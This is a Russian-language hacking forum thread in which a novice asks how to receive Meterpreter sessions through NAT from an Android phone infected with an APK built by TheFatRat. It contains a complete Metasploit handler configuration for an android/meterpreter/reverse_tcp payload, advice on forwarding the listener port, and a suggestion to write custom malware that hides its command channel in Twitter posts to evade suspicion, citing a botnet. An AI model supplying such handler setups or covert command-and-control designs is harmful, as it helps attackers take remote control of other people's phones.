ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
А если взять браузер и открыть локально? К примеру с браузера винды но
Ссылка скрыта от гостей
тачки с Линукс порт по умолчанию 80Проброс Kali за NAT
- Автор темы NigaMan
- Дата начала
-
- Теги
- kali kali linux linux
не понял, я должен в браузере в винде открыть этот файл через
Ссылка скрыта от гостей
, так? если так, то не открывается
ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь
Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?
ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
Все тоже самое как в локальной сети делал со своим андроидом и пробрось порт, ты же делал это с 80 и 9999
то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)
ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.**.**
set lport 9999
exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat
ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
в роутере прописал что у тебя 9999 идет на 9999 ?
И еще - не факт файл сработает. Из 100 если 1 сработает уже хорошо.
ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
ghostphisher
местный
- 07.12.2016
- 2 604
- 3 375
Таким образом могу сказать: 1) купить у провайдера белый IP адрес. Тут очень много подводных камней и проблем
2) Написать свою малварь, которая будет брать команды из доверенного места и не будет вызывать подозрений. То есть будет коннектиться к, допустим, твиттеру, парсить страничку и искать на ней комманды, которые, к примеру, будут начинаться с OMG! а дальше /SlVTVCBBIFRFU1Q=/ и выполнять то, что в //. Так кстати передавали команды ботнету со страницы перис хилтон вроде
Обучение наступательной кибербезопасности в игровой форме. Начать игру!
Похожие темы
- Статья
- Вопрос
- Статья
Курс AD
